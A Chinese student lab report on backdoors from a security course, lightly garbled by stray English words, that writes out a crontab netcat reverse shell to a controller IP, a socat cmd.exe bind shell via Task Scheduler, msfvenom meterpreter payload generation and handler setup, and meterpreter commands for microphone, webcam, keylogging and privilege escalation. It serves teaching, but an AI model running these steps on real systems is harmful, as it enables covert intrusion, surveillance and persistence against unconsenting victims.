20155312 张竞予 Exp2 后门原理与实践

Exp2 后门原理与实践

目录


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?linux

多是咱们点开某个连接的时候,自动加载了某个可执行文件,就相似于执行了实验中传入到windows中的backdoor.exe;也多是咱们点开某个网页时,该网页经过木马的方式在咱们不知情的状况下自动下载了某个后门文件。web

(2)例举你知道的后门如何启动起来(win及linux)的方式?shell

  • linux中可能crontab文件被修改,周期性(定时)反向链接控制主机,只要控制主机保持侦听状态,就能够周期性启动后门,控制被控主机。
  • windows中多是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。

(3)Meterpreter有哪些给你映像深入的功能?windows

可以获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。安全

(4)如何发现本身有系统有没有被安装后门?tcp

利用防火墙,在防火墙看开启的端口及对应的进程,通常不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通讯的数据,分析是否是后门。编辑器

按期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。ui

返回目录3d


实践过程记录

1、使用netcat获取主机操做Shell,cron启动code

首先查看WindowsIP和LinuxIP:

  • Windows下用命令ipconfig

  • Linux下用ifconfig -a

Windows得到linux的shell:

cron启动过程以下:

  1. 先在Windows系统下,监听8888端口
  2. 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择"3";
  3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每一个小时的第37分钟反向链接Windows主机的8888端口,设置成09的缘由是我当时的时间是11点07,为了能立马看到效果,因此我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);

4.最后运行结果以下所示:

返回目录

2、使用socat获取主机操做Shell, 任务计划启动

1.Windows+X,而后选择“控制面板”(win8下打开控制面板)

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操做”->“建立任务”

5.输入任务名

6.新建触发器,在操做->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的做用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上

7.建立完成以后,按Windows+L快捷键锁定计算机,再次打开时,能够发现以前建立的任务已经开始运行

8.socat - tcp:192.168.199.196:8888,这里的第一个参数-表明标准的输入输出,第二个流链接到Windows主机的8888端口,此时能够发现已经成功得到了一个cmd shell:(此处的IP地址为WindowsIP)

返回目录

3、使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”

2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

4.传送接收文件成功,以下图所示:

5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块,设置payload

7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8.set LHOST 192.168.20.136,这里用的是LinuxIP,和生成后门程序时指定的IP相同

9.set LPORT 8888,一样要使用相同的端口

10.开始监听

返回目录

4、使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.使用record_mic指令能够截获一段音频:(能够+“-d 时间”来设定录制时间)

2.使用webcam_snap指令可使用摄像头进行拍照:

3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,因为是Win8系统,提权失败:

5.其余操做:

  • 使用screenshot指令能够进行截屏
  • 用webcam stream指令可使用摄像头进行录像
  • ……

返回目录


实验总结与体会

经过本次实验,我学会了若是对linux和windows植入后门,包括开启侦听、反向链接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操做Shell等。在动手实验的过程当中既体会到了做为攻击者的乐趣,更加深入的体会到了使用计算机时加强安全意识的重要性。平时上网的时候,必定要注意不点击不靠谱连接,下载软件时尽可能选择官网下载,防止下载盗版软件时被捆绑下载其余后门程序。

返回目录

相关文章
相关标签/搜索